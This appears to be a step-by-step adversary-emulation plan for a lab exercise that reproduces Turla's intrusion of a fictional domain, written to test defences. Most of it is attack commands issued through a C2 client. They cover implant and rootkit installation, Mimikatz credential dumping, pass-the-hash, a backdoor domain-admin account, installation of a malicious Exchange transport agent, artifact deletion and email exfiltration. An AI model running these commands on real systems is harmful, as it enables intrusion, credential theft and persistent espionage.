#
Scenario Overview
Legend of symbols:
- 💡 - callout notes
- ❗ - extremely important note
- ➡️ - Switching to another session
- ⭕ - Sign out of something
#
Setup
➡️ RDP, do not SSH, to the Kali attacker machine (176.59.15.33)
.
- Open a new terminal window, cd to the cloned repo control server, and start the control server:
cd /opt/day2/turla/Resources/control_server
rm logs.txt
sudo ./controlServer -c ./config/turla_day2.yml
- Ensure the EPIC, Snake, and LightNeuron handlers started up.
#
Step 11 - Initial Compromise and Establish Foothold
🎤 Voice Track:
Step 11 emulates Turla gaining initial access via a watering hole attack
targeting user Egle
.
Egle
visits a legitimate, but compromised website. This website redirects
Egle
to a duplicated, malicious version of the compromised website
hosted on an adversary server containing javascript (JS) that fingerprints
their machine in the background and installs an evercookie on their browser.
This malicious WordPress website prompts Egle
with a notice to update their
NotFlash. Egle
clicks to download the update, NFVersion_5e.exe, containing
EPIC (a.k.a. Tavdig/Wipbot).
The execution flow of EPIC follows the same execution flow of EPIC in the Carbon scenario. The only difference with this scenario's version of EPIC is it communicates over HTTPS instead.
Once C2 communications have been established between EPIC and the C2 via the proxy server, discovery is performed on the first host where information about the host device and domain computers is collected.
#
☣️ Procedures
➡️ RDP to Azuolas (10.100.40.103)
as Egle
:
Open Microsoft Edge and browse to
nato-int.com
.Wait for redirection to
anto-int.com
.After redirection you will prompted to update NotFlash. Click to download the update (
NFVersion_5e.exe
) bundled with EPIC (a.k.a. Tavdig/Wipbot).Once the download has been completed, click the downloaded binary to execute it.
Wait 1 minute for it to finish running.
Close out of all tabs and sign out of your RDP session.
Re-RDP to
Azuolas (10.100.40.103)
asEgle
:
- Open Microsoft Edge and browse to
https://drebule.nk.local/owa
. Log in asEgle
:
➡️ Set a timer for 2 minutes then switch to your Kali control server terminal and confirm that a new implant has registered and the automated discovery output has been returned in the server log.
NOTE: The injector will wait 2 minutes, before injecting EPIC's Guard DLL into explorer.exe and, subsequently, EPIC's worker DLL into Microsoft Edge.
Within the terminal window, split your terminal horizontally via right-click -> split terminal. Be careful not to accidentally terminate the control server.
In your lower terminal tab, task the EPIC implant with the following set of discovery commands:
cd /opt/day2/turla/Resources/control_server
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | systeminfo && net group "Domain Computers" /domain'
#
🗿 Source Code
- Watering Hole
- Browser redirection
- Browser evercookie (utilized built-in BeEF Evercookie from the Browser Exploitation Framework)
- Fingerprinting details
- EPIC Dropper
- EPIC Injector
- Extract EPIC Guard DLL from resources section FindResourceW
- Targeting explorer.exe for DLL injection
- EPIC Guard
- Extract EPIC payload DLL from resources section FindResourceW
- Targeting svchost.exe for payload DLL injection
- EPIC Payload (in msedge.exe)
- Execute commands ExecCmd
- User discovery GetAllUsers
- Directory discovery DirectoryDiscovery
- Write results to log file WriteResults
- C2 communications are:
- C2 communications are over HTTPS, HTTPS specific flags
#
🔬 Cited Intelligence
- https://securelist.com/analysis/publications/65545/the-epic-turla-operation/
- https://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/waterbug-attack-group.pdf
- https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08080105/KL_Epic_Turla_Technical_Appendix_20140806.pdf
- https://recon.cx/2018/brussels/resources/slides/RECON-BRX-2018-Visiting-The-Snake-Nest.pdf
- https://www.govcert.ch/downloads/whitepapers/Report_Ruag-Espionage-Case.pdf
- https://docs.broadcom.com/doc/waterbug-attack-group
- https://www.welivesecurity.com/2020/03/12/tracking-turla-new-backdoor-armenian-watering-holes/
- https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/
- https://github.com/samyk/evercookie
#
Step 12 - Rootkit Installation
🎤 Voice Track:
Step 12 emulates Turla exploiting a vulnerable driver to install the Snake rootkit
on the Azuolas (10.100.40.103)
system.
The existing EPIC implant, running under the context of Egle
, will be used to download
the Snake installer to the local machine and execute the installer as second stage
malware. The Snake installer will escalate privileges to SYSTEM by exploiting a Windows 10 vulnerability.
Once running as SYSTEM, the installer will disable DSE by loading and exploiting a vulnerable driver.
Once DSE is disabled, the installer will load the Snake rootkit driver.
The rootkit driver will hook various functions and will inject a user-mode DLL into a SYSTEM process to execute received tasks from the C2 server. The driver will then wait for a browser process to make a network request to inject the user-mode DLL into the browser for C2 communications over HTTP. The injected DLLs will communicate between each other via named pipes.
At some point, Egle
will browse to a website, triggering the rootkit driver to
inject the user-mode DLL into the browser process - this DLL will begin communication with the C2 server
over HTTP.
#
☣️ Procedures
In your Kali C2 server, ensure that you are in the lower split terminal window.
Task the EPIC implant to download the Snake rootkit installer.
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'name | C:\\Users\\Egle\\Desktop\\gusbsys.exe | snake.exe'
- Wait 1 minute after the payload is sucessfully downloaded before tasking the implant to execute the Snake rootkit installer with the privilege escalation option:
./evalsC2client.py --set-task 218780a0-870e-480e-b2c5dc 'exe | C:\\Users\\Egle\\Desktop\\gusbsys.exe -f'
- ➡️ Switch to your RDP session in
azuolas (10.100.40.103)
and go to your Edge window. Perform a hard refresh on the current page by pressing Ctrl+Shift+R.
➡️ Return to your Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.
#
🗿 Source Code
- EPIC
- File download DownloadFile
- Execute commands ExecCmd
- Snake Installer
- Snake Rootkit
- Snake Usermodule DLL
#
🔬 Cited Intelligence
- Report 9: Securelist/Artemon- Uroburos
- Report 10: BAE/Artemon- Snake
- Report 11: GData- Uroburos
- Report 12: CIRCL- TR-25
- Report 13: GData- Kernel Protection Mitigation
- Report 14: GData- using WinDbg
- Report 16: GData- Project Cobra
- Report 17: Tetrane- Uroburos with REVEN
- Report 18: Talos- Snake Campaign
- Report 19: Lastline- Dissecting Turla Rootkit
- Report 20: Lastline- Kernel Exploit Makeover
- Report 27: GitHub- hfiref0x/TDL
- Report 28: CoreLabs- VirtualBox Privilege Escalation
- Report 29: Unit42- Acidbox
#
Step 13 - First Workstation Discovery
🎤 Voice Track:
Step 13 emulates Turla performing discovery on the first workstation to discover a file server and associated file server admin.
The Snake rootkit receives tasking from the C2 server to enumerate currently
running processes on the local computer and finds that EgleAdmin
also has
processes running. Further enumeration of the EgleAdmin
user shows that it is
a member of the File Server Admins
group. Snake then impersonates Egle
to
enumerate mapped drives on the local machine and discovers Egle
's home drive
is actively mapped to the file server.
#
☣️ Procedures
➡️ Return to your RDP session to
azuolas (10.100.40.103)
asEgle
.Open up a powershell terminal and run the following command:
runas /user:nk\egleadmin powershell
- When prompted, type in the password for
EgleAdmin
:
- A new powershell window should pop up. Run the following command to ensure that you are running as
nk\EgleAdmin
:
whoami
➡️ Return to your Kali C2 server.
From your lower Kali C2 terminal window, task the Snake rootkit to run the following process discovery command:
# Discover running processes
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
- ❗ Verify that the enumerated processes output contains a process running under
EgleAdmin
grep 'NK\\EgleAdmin' logs.txt -i
- This should return output similar to the following:
-
powershell.exe 2868 RDP-Tcp#6 5 79,140 K Unknown NK\egleadmin 0:00:00 N/A conhost.exe 7368 RDP-Tcp#6 5 18,088 K Unknown NK\egleadmin 0:00:00 N/A
Wait 1 minute then execute the next discovery command to enumerate
EgleAdmin
's groups:
# Enumerate details on EgleAdmin to find group membership
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "user /domain EgleAdmin"}'
❗ Verify that File Server Admins
is listed as one of the groups that EgleAdmin
is a member of.
- Wait 1 minute then execute the next discovery command to the drive mapped to the file server:
# Discover that the local machine has a drive mapped to the file server
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "net.exe", "args": "use", "runas": "nk\\Egle"}'
❗ Verify that the home drive is mapped to the file server host berzas
(10.100.30.204
).
#
🗿 Source Code
#
🔬 Cited Intelligence
#
Step 14 - Lateral Movement to File Server
🎤 Voice Track:
Step 14 emulates Turla using the discovered admin account to laterally move to the file server and install the Snake rootkit on it.
Using the information discovered in the previous step, Snake impersonates the EgleAdmin account to run PsExec and execute another copy of the Snake rootkit installer on the file server. This new copy of the Snake installer will have the installed rootkit beacon back to the C2 server via a different redirector.
#
☣️ Procedures
- Tasking the implant to download PsExec.
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "PsExec.exe", "dest":"C:\\Windows\\System32\\file_svc_mgr.exe"}'
- Wait 1 minute and then run the following command to download the snake installer:
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 4, "file": "installer_v2.exe", "dest":"C:\\Windows\\System32\\cmu_svc_v2.exe"}'
- Wait 1 minute before running the following command to execute PsExec as
EgleAdmin
, which will run the Snake installer on the file serverberzas (10.100.30.204)
:
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 3, "proc": "C:\\Windows\\System32\\file_svc_mgr.exe", "args":"\\\\berzas -accepteula -s -c C:\\Windows\\System32\\cmu_svc_v2.exe", "runas":"nk\\EgleAdmin"}'
➡️ Go back to your RDP session to Azuolas (10.100.40.103)
as Egle
.
- Minimize the RDP window.
➡️ RDP into berzas
(10.100.30.204
) as EgleAdmin
:
Close any spurious windows
Open Edge and navigate to https://www.google.com. Perform a search on
File server configuration best practices
, but don't click on any results.Minimize the RDP window, keeping processes running.
➡️ Check the Kali C2 server terminal window and verify that a new implant session is beaconing back to the C2 server.
- Wait 1 minute before running the following command to remove files from
Azuolas (10.100.40.103)
:
./evalsC2client.py --set-task 534b40585d514b554844 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\file_svc_mgr.exe C:\\Windows\\System32\\cmu_svc_v2.exe"}'
#
🗿 Source Code
#
🔬 Cited Intelligence
#
Step 15 - Domain Discovery
🎤 Voice Track:
Step 15 emulates Turla using Powershell to perform Active Directory user, group, and computer discovery.
The Snake rootkit receives tasking from the C2 server to use Powershell's ActiveDirectory
module to enumerate domain users, admin groups, and computers. Upon discovering Zilvinas
's regular and domain admin accounts, Snake will enumerate further details on the accounts. Snake then
discovers a workstation belonging to Zilvinas
to use as a future lateral movement target.
#
☣️ Procedures
- From your lower Kali C2 control server terminal window, task Snake to check if the
ActiveDirectory
PowerShell module is installed.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Get-Module -ListAvailable -Name ActiveDirectory"}'
❗ Verify that you see output. If the implant returns empty output, please contact your lead.
- Wait 1 minute before tasking Snake to collect a list of Active Directory groups containing the word "management", as members of these groups will likely have elevated permissions on the network.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroup -Filter * | Where-Object Name -Match \"management\" | Select Name"}'
❗ Verify that Server Management
is included in the results.
- Wait 1 minute before tasking Snake to obtain the usernames of accounts within the
Server Management
domain group. This will instruct Turla on users to target next.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Server Management\" | Select Name,SamAccountName"}'
❗ Verify that ZilvinasAdmin
shows up in the list of accounts.
- Wait 1 minute before tasking Snake to obtain the usernames of accounts within the
Domain Admins
domain group.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADGroupMember -Identity \"Domain Admins\" | Select Name,SamAccountName"}'
❗ Verify that ZilvinasAdmin
shows up in the list of accounts.
- Wait 1 minute before tasking Snake to discover domain users. Ensure
Zilvinas
andZilvinasAdmin
appear in the output.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADUser -Filter {LastLogonDate -ne 0} -Properties * | Select Name,SamAccountName"}'
- Finally, wait 1 minute before tasking Snake to obtain a list of domain computers and some of their information (IP addresses, DNS names, and description).
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 2, "command": "$ProgressPreference = \"SilentlyContinue\"; Import-Module ActiveDirectory; Get-ADComputer -Filter * -Properties * | Select Name,DnsName,IPv4Address,Description"}'
❗ Ensure that Zilvinas' Workstation
appears in the Description
field for uosis
#
🗿 Source Code
#
🔬 Cited Intelligence
- TBD
#
Step 16 - Preparation for Lateral Movement to Admin Workstation
🎤 Voice Track:
Step 16 emulates Turla performing credential dumping on the file server with the goal of moving laterally to a workstation owned by a Domain Admin.
Snake downloads Mimikatz to the file server and extracts all NTLM hashes on the target. The command output is sent directly to the C2 server.
#
☣️ Procedures
- From the Kali C2 server lower terminal window, task Snake to download Mimikatz to the file server:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "mimikatz.exe", "dest": "C:\\Windows\\System32\\loadperf.exe"}'
- Wait 1 minute and then instruct Snake to download PsExec to the file server:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "PsExec.exe", "dest": "C:\\Windows\\System32\\fs_mgr.exe"}'
- Wait 1 minute and then run the following command to download the snake installer:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 4, "file": "installer_v3.exe", "dest":"C:\\Windows\\System32\\cmu_svc.exe"}'
- Wait 1 minute and then instruct Snake to run Mimikatz to dump all NTLM hashes from
LSASS.exe
:
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"pr::d\" \"slsa::lop\" \"quit\""}'
- ❗ Verify that the password
Producer2!
and NTLM hashf3fcd61f987a97da49ce5f650b4e6539
forZilvinasAdmin
appears at least once in the output.
grep '* Username : ZilvinasAdmin' logs.txt -C 5 -i
- This should return:
-
* Username : ZilvinasAdmin * Domain : NK * NTLM : f3fcd61f987a97da49ce5f650b4e6539 * SHA1 : fc8c801521140666c793108b67716caf4c4189f4 * DPAPI : b06d7bea8849897b811e1d73ab22726c tsPkG : -- * Username : ZilvinasAdmin * Domain : NK * Password : Producer2! kErberoS : * Username : ZilvinasAdmin * Domain : NK.LOCAL * Password : (null) sSp : crEdMan :
#
🗿 Source Code
#
🔬 Cited Intelligence
- TBD
#
Step 17 - Lateral Movement to Admin Workstation and Persistence
🎤 Voice Track:
Step 17 emulates Turla performing lateral movement to the domain admin's workstation and performing additional persistence by creating a new domain admin account.
The retrieved NTLM hash discovered in the previous step is used in a pass-the-hash attack to move laterally to Zilvinas
's workstation. PsExec is used via pass-the-hash to execute and install the Snake rootkit on the target workstation.
Once the admin workstation has been compromised, Snake is used to enumerate processes running on Zilvinas
's workstation uosis
, where it is discovered that ZilvinasAdmin
has processes running which can be used for token impersonation. By impersonating ZilvinasAdmin
, a new domain user Leshy
is created and added to the Domain Admins
domain group for persistence.
#
☣️ Procedures
- Instruct Snake to pass-the-hash using
ZilvinasAdmin
's NTLM hash to run PsExec and install Snake on the target workstation.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 3, "proc": "C:\\Windows\\System32\\loadperf.exe", "args": "\"privilege::debug\" \"sekurlsa::pth /user:ZilvinasAdmin /ntlm:f3fcd61f987a97da49ce5f650b4e6539 /domain:nk.local /remotepc:uosis /pexe:C:\\Windows\\System32\\fs_mgr.exe /sys:1 /prun:C:\\Windows\\System32\\cmu_svc.exe\" \"quit\""}'
➡️ Wait 2 minutes. Start a new RDP session to uosis
(10.100.40.102
) as Zilvinas
:
- Open Edge and navigate to
https://drebule.nk.local/owa
. Log in asZilvinas
:
- Spend a couple minutes reading through any unread emails to wait for the implant to start beaconing back to the C2 server.
➡️ Return to the Kali C2 terminal window and verify that a new implant session is beaconing back to the C2 server.
- Wait 1 minute and then task the implant to delete artifacts from the file server.
./evalsC2client.py --set-task 5054474d50435a51404b '{"type": 1, "command": "del /Q C:\\Windows\\System32\\fs_mgr.exe C:\\Windows\\System32\\loadperf.exe C:\\Windows\\System32\\cmu_svc.exe"}'
➡️ Return to your RDP session to
uosis (10.100.40.102)
asZilvinas
.Click on the search bar and search for
powershell
. Right clickpowershell
and then click "Run as Administrator".When prompted, type in the username and password for
ZilvinasAdmin
:
- A new powershell window should pop up. Run the following command to ensure that you are running as
nk\ZilvinasAdmin
:
whoami
➡️ Return to the Kali C2 server
- From the lower terminal window, task Snake to enumerate running processes on the machine to discover processes under
ZilvinasAdmin
.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "tasklist.exe", "args": "/v"}'
- ❗ Verify that we find processes running under
ZilvinasAdmin
grep 'NK\\ZilvinasAdmin' logs.txt -i
- This should return output similar to the following:
-
powershell.exe 8152 RDP-Tcp#2 3 83,280 K Unknown NK\ZilvinasAdmin 0:00:00 N/A conhost.exe 312 RDP-Tcp#2 3 17,356 K Unknown NK\ZilvinasAdmin 0:00:00 N/A
Wait 1 minute, then instruct Snake to create a new domain user
Leshy
using an access token from one of theZilvinasAdmin
processes.Leshy
will be used as a backdoor domain admin account for persistence on the domain.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net user leshy Password12345 /add /domain", "runas": "nk\\zilvinasadmin"}'
- Wait 1 minute, then instruct Snake to add
Leshy
to theDomain Admins
group.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "net group \"Domain Admins\" leshy /add /domain", "runas": "nk\\zilvinasadmin"}'
#
🗿 Source Code
#
🔬 Cited Intelligence
- TBD
#
Step 18 - Lateral Movement to Exchange Server
🎤 Voice Track:
Step 18 emulates Turla laterally moving to the Exchange server and installing the LightNeuron implant there.
Snake downloads LightNeuron and associated Powershell installation script and config files, transfers them to the Exchange server, and remotely executes the installation script using WMI to install LightNeuron on the Exchange server.
#
☣️ Procedures
- From the Kali C2 lower terminal window, task Snake to download LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "ln_transport_agent.dll", "dest":"C:\\Windows\\System32\\mtxconf.dll"}'
- Wait 1 minute and then task Snake to download the companion DLL for LightNeuron:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "n_installer_aux.dll", "dest":"C:\\Windows\\System32\\mtxcli.dll"}'
- Wait 1 minute and then task Snake to download the Powershell installation script for LightNeuron.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "msiex.ps1", "dest":"C:\\Windows\\System32\\msiex.ps1"}'
- Wait 1 minute and then task Snake to download the LightNeuron email rules file.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "rules.xml", "dest":"C:\\Windows\\System32\\wdr.rules.xml"}'
- Wait 1 minute and then task Snake to download the LightNeuron config file.
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 4, "file": "winmail.dat", "dest":"C:\\Windows\\System32\\perfe009.dat"}'
- Wait 1 minute and then task Snake to copy LightNeuron, the rules config file, and the Powershell installation script to the remote target
drebule
, using token impersonation to perform the copy asZilvinasAdmin
.
# Copy LightNeuron
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxconf.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\V15\\TransportRoles\\agents\\Hygiene\\Microsoft.Exchange.Transport.Agent.ConnectionFiltering.dll\"", "runas": "nk\\zilvinasadmin"}'
- Wait 1 minute before copying the next file:
# Copy LightNeuron companion DLL
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\mtxcli.dll \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\exdbdata.dll\"", "runas": "nk\\zilvinasadmin"}'
- Wait 1 minute before copying the next file:
# Copy installation script
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\msiex.ps1 \\\\drebule\\C$\\Windows\\System32\\msiex.ps1", "runas": "nk\\zilvinasadmin"}'
- Wait 1 minute before copying the rules file:
# Copy email rules file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\wdr.rules.xml \\\\drebule\\C$\\Windows\\ServiceProfiles\\NetworkService\\AppData\\Local\\Temp\\msmdat.xml", "runas": "nk\\zilvinasadmin"}'
- Wait 1 minute before copying the last config file:
# Copy config file
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "copy C:\\Windows\\System32\\perfe009.dat \"\\\\drebule\\C$\\Program Files\\Microsoft\\Exchange Server\\v15\\bin\\winmail.dat\"", "runas": "nk\\zilvinasadmin"}'
- Wait 1 minute and then task Snake to install LightNeuron remotely using WMI and Powershell, using
ZilvinasAdmin
's token
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 3, "proc": "wmic.exe", "args": "/node:drebule /privileges:enable /output:STDOUT process call create \"cmd.exe /c powershell.exe -File C:\\Windows\\System32\\msiex.ps1 > C:\\Windows\\Temp\\msiexinstallation.log 2>&1\"", "runas": "nk\\ZilvinasAdmin"}'
❗ Verify that the WMIC output shows a ReturnValue
of 0.
- Wait 1 minute and then task Snake to check the installation log for any errors:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "type \\\\drebule\\C$\\Windows\\Temp\\msiexinstallation.log", "runas": "nk\\ZilvinasAdmin"}'
Expected output will start with messages regarding PS-Session, the bottom of the file should look like:
PSComputerName : localhost RunspaceId : 1e56a6dd-5fd2-4545-9db8-2a4ca6a77212 Enabled : False Priority : 10 TransportAgentFactory : Microsoft.Exchange.Transport.Agent.ConnectionFiltering.ConnectionFilteringAgentFactory AssemblyPath : C:\Program Files\Microsoft\Exchange Server\V15\TransportRoles\agents\Hygiene\Microsoft.Exchange .Transport.Agent.ConnectionFiltering.dll IsCritical : True EscalationTeam : Identity : Connection Filtering Agent IsValid : True ObjectState : New WARNING: Please exit Windows PowerShell to complete the installation. WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport WARNING: The following service restart is required for the change(s) to take effect : MSExchangeTransport WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to stop... WARNING: Waiting for service 'Microsoft Exchange Transport (MSExchangeTransport)' to start...
❗ If the output contains any errors, notify your lead.
- Wait 1 minute and then task Snake to remove artifacts from
uosis (10.100.40.102)
:
./evalsC2client.py --set-task 475e465e424557475b42 '{"type": 1, "command": "del /Q C:\\Windows\\System32\\msiex.ps1 C:\\Windows\\System32\\wdr.rules.xml C:\\Windows\\System32\\mtxconf.dll C:\\Windows\\System32\\mtxcli.dll C:\\Windows\\System32\\perfe009.dat"}'
#
🗿 Source Code
#
🔬 Cited Intelligence
- TBD
#
Step 19 - Discovery and Email Collection
🎤 Voice Track:
Step 19 emulates Turla sending several discovery commands to the LightNeuron implant and collecting and exfiltrating email traffic.
Emails with JPG attachments containing AES encrypted commands embedded using stegonagraphy are sent from the C2 server to the domain. LightNeuron's transport agent processes all emails via LightNeuron's companion DLL, which executes the embedded command and blocks delivery of the email from the C2 server.
LightNeuron automatically collects all emails with recipients matching nk.local
in a log file (C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\msmdat.xml
).
Eventually, LightNeuron is tasked to exfiltrate the email log, which is exfiltrated over the existing C2 channel.
#
☣️ Procedures
- From the Kali C2 lower terminal window, task LightNeuron to perform system network configuration discovery:
./evalsC2client.py --set-task info@nk.local '5 | ipconfig /all'
❗ If no response is received after 5 minutes, check the postfix logs on the Kali server to make sure the email was intercepted and processed correctly by LightNeuron.
grep postfix /var/log/syslog
- If there is a
reject
entry, that means the email, destined for a nonexistent user, was processed by the Exchange server, meaning that LightNeuron was either not successfully installed or is not working properly.
- If there is a
➡️ Return to your RDP session to
uosis (10.100.40.102)
asZilvinas
.Go to your Edge browser window with the OWA page. Your windows should still be up from Step 6.
Create a new email:
The email recipient should be the user
egle@nk.local
The email subject should be
SAP Integration Issue
The following text should be pasted in as the email body:
Hi Egle, After our meeting earlier I spoke with Tenko about the SAP integration issue that was preventing the users from logging in. I did a little digging and noticed there is an authentication error on the SAP server. When you get a few minutes could you check to make sure the service account is still active and the credentials have not expired? The account name is SVC_SAP2.
Send the email
➡️ Switch to your RDP window to Azuolas
(10.100.40.103
) as Egle
.
Go to your Edge browser window. You should still be logged into OWA from Step 2.
You should see the email from
Zilvinas@nk.local
. Try reloading the page if needed.Reply to the email from Zilvinas.
The following text should be pasted in as the email reply body:
Zilvinas, I just checked on the service account. It appears that the account was still active, but the password had expired. I've adjusted the settings for the account, so the password should not expire again. The new password is: dfsbH%T5RWf3bwq3aeGR$3% Let me know if this fixes the authentication issue.
Send the email
➡️ Return to the Kali C2 server lower terminal window. Task the LightNeuron implant to exfiltrate the email log file:
./evalsC2client.py --set-task info@nk.local '3 | 0'
- The file contents will be logged by the control server. ❗ Verify that exfil was logged by the control server by checking the terminal window with the server output or by checking the server log file. The logs should contain the password Egle sent to Zilvinas:
grep 'dfsbH%T5RWf3bwq3aeGR$3%' /opt/day2/turla/Resources/control_server/logs.txt